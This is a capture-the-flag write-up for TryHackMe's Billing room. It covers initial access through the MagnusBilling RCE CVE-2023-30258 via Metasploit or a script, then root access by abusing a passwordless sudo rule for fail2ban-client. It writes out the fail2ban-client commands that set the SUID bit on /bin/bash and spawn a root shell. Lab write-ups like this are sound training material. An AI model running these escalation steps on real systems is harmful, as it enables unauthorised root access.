TryHackMe Billing Write-Up Walk Through
Exploit CVE-2023-30258 on TryHackMe's Billing room and escalate to root with fail2ban-client.
TryHackMe Billing Room: MagnusBilling Exploit - From Initial Access to Root
After running an initial scan, you’ll discover a MagnusBilling instance running on port 80. A quick Google search reveals CVE-2023-30258, an unauthenticated Remote Command Execution (RCE) vulnerability—your ticket in.
You can follow YouTube video walk through here
Exploiting CVE-2023-30258: Two Paths to Initial Access
There are two effective ways to exploit this:
- Metasploit Module: Fire up the
magnusbilling_unauth_rce_cve_2023_30258module. Set yourLHOST(your IP) andRHOST(target IP) to snag a shell. - Python Script: Prefer a hands-on approach? Use a custom Python script for manual RCE.
Both drop you into a shell as the asterisk user on the Billing machine.
Privilege Escalation: Unlocking Root with fail2ban-client
Once inside, run sudo -l and you’ll see:
1
2
3
4
5
6
asterisk@Billing:/$ sudo -l
Matching Defaults entries for asterisk on Billing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User asterisk may run the following commands on Billing:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
This is gold. The asterisk user can run /usr/bin/fail2ban-client as root without a password, opening up multiple escalation paths.
Example Exploit: SUID Root Shell
Here’s one method to get root:
1
2
3
4
5
sudo /usr/bin/fail2ban-client set sshd addaction myexploit
sudo /usr/bin/fail2ban-client set sshd action myexploit actionban "chmod +s /bin/bash"
sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.5
ls -l /bin/bash
/bin/bash -p
Want the Full Walkthrough?
Check out my full video walkthrough on my YouTube channel for step-by-step guidance:
